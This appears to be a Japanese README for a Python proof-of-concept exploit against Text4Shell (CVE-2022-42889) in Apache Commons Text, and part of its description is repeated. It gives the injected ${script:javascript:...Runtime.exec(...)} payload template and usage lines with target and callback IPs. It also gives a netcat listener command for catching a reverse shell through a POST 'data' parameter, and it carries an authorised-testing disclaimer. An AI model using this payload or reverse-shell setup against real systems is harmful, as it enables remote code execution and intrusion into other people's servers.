
Apache Commons Text のバージョン 1.10 未満に存在する重大なリモートコード実行 (RCE) 脆弱性である Text4Shell (CVE-2022-42889) を標的とした、カスタム Python ベースの概念実証 (PoC) エクスプロイト。
Apache Commons Text のバージョン < 1.10 における重大なリモートコード実行の脆弱性である Text4Shell(CVE-2022-42889)を対象とした、カスタムの Python ベースの概念実証(PoC)エクスプロイトです。
このエクスプロイトは、補間が有効な StringSubstitutor クラスを使用する脆弱な Java アプリケーションを対象としており、${script:...} 式を注入して任意のシステムコマンドを実行できるようにします。
この PoC では、data クエリパラメータを介した悪用を示しています。ただし、脆弱なパラメータ名は実装によって異なる場合があります。ユーザーは、ターゲットアプリケーションのロジックに基づいてペイロードとリクエストパスを適宜調整してください。
免責事項: このエクスプロイトは、教育および許可されたペネトレーションテストの目的でのみ提供されます。責任を持って、自己責任で使用してください。
これは、Text4Shell(CVE-2022-42889)として知られる Apache Commons Text の脆弱性に対するカスタム Python3 エクスプロイトです。ユーザー入力が StringSubstitutor によって動的に評価されるとき、安全でないインターポレータを介したリモートコード実行(RCE)を可能にします。
テスト済み:
${script:...} 補間を使用する Java アプリケーションpython3 text4shell.py <target_ip> <callback_ip> <callback_port>
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
nc -nlvp 4444
スクリプトは以下を注入します:
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
リバースシェルは、POST リクエストを使用して /data パラメータ経由で送信されます。